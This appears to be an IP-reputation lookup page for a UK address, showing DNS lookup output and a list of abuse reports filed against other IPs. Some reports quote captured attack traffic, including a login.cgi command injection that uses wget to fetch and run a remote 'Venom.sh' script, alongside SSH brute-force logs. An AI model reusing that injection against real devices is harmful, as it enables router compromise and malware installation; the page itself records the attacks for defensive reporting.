Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United Kingdom of Great Britain and Northern Ireland (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 105.22.139.165
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 35764
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;105.22.139.165.			IN	A

;; AUTHORITY SECTION:
.			283	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023112203 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Nov 23 09:16:28 CST 2023
;; MSG SIZE  rcvd: 107
Host info
Host 165.139.22.105.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 165.139.22.105.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
142.93.46.172 attackspam
10 attempts against mh-misc-ban on heat.magehost.pro
2019-12-23 15:15:54
220.194.237.43 attackspam
12/23/2019-01:29:39.331516 220.194.237.43 Protocol: 6 ET SCAN NMAP -sS window 1024
2019-12-23 15:51:48
41.43.252.134 attackspambots
DLink DSL Remote OS Command Injection Vulnerability, PTR: host-41.43.252.134.tedata.net.
2019-12-23 15:19:02
106.12.178.62 attackbots
Dec 23 08:03:29 lnxweb62 sshd[18177]: Failed password for backup from 106.12.178.62 port 46000 ssh2
Dec 23 08:03:29 lnxweb62 sshd[18177]: Failed password for backup from 106.12.178.62 port 46000 ssh2
2019-12-23 15:09:27
117.220.196.44 attackbots
Unauthorized connection attempt detected from IP address 117.220.196.44 to port 1433
2019-12-23 15:31:04
149.202.206.206 attackspambots
Dec 23 08:10:14 ns37 sshd[12463]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=149.202.206.206
2019-12-23 15:25:15
1.160.82.95 attackspam
firewall-block, port(s): 2323/tcp
2019-12-23 15:24:13
37.187.122.195 attackbots
$f2bV_matches
2019-12-23 15:38:20
23.94.81.50 attackbots
C1,WP GET /suche/wordpress/wp-login.php
2019-12-23 15:51:15
14.240.21.148 attackspambots
Unauthorized connection attempt detected from IP address 14.240.21.148 to port 445
2019-12-23 15:48:44
41.237.222.250 attackspambots
1 attack on wget probes like:
41.237.222.250 - - [22/Dec/2019:19:26:26 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 15:45:49
172.81.250.132 attack
Dec 23 08:31:25 MK-Soft-Root2 sshd[18815]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.81.250.132 
Dec 23 08:31:27 MK-Soft-Root2 sshd[18815]: Failed password for invalid user ftpuser from 172.81.250.132 port 53960 ssh2
...
2019-12-23 15:36:09
197.43.200.1 attackspambots
3 attacks on wget probes like:
197.43.200.1 - - [22/Dec/2019:21:51:24 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 15:17:26
159.203.201.8 attack
Portscan or hack attempt detected by psad/fwsnort
2019-12-23 15:39:31
217.218.21.8 attackbots
Dec 23 08:11:18 ns381471 sshd[19150]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.218.21.8
Dec 23 08:11:20 ns381471 sshd[19150]: Failed password for invalid user backups from 217.218.21.8 port 60838 ssh2
2019-12-23 15:12:42

Recently Reported IPs

105.22.27.249 105.22.182.52 105.22.236.31 105.219.98.113
105.22.1.36 105.22.122.245 105.22.185.251 105.219.80.28
105.219.89.6 105.22.12.62 105.219.200.153 105.22.125.102
105.219.54.193 105.219.9.167 105.219.85.187 105.219.21.130
105.219.4.213 105.219.5.184 105.219.210.178 105.219.249.84